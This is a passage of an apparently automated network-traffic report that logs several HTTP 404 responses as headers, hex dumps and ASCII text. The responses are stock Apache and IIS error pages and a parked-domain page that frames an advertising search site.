61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:29 GMTContent-Type: text/htmlContent-Length: 867Connection: keep-aliveServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:29 GMTContent-Type: text/htmlContent-Length: 867Connection: keep-aliveServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesExpires: Sat, 02 Dec 2023 01:09:39 GMTAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:29 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 01 Dec 2023 22:09:28 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:29 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:29 GMTContent-Type: text/htmlContent-Length: 867Connection: keep-aliveServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 01 Dec 2023 22:09:28 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:29 GMTServer: ApacheTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10File not found.0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Fri, 01 Dec 2023 22:09:28 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 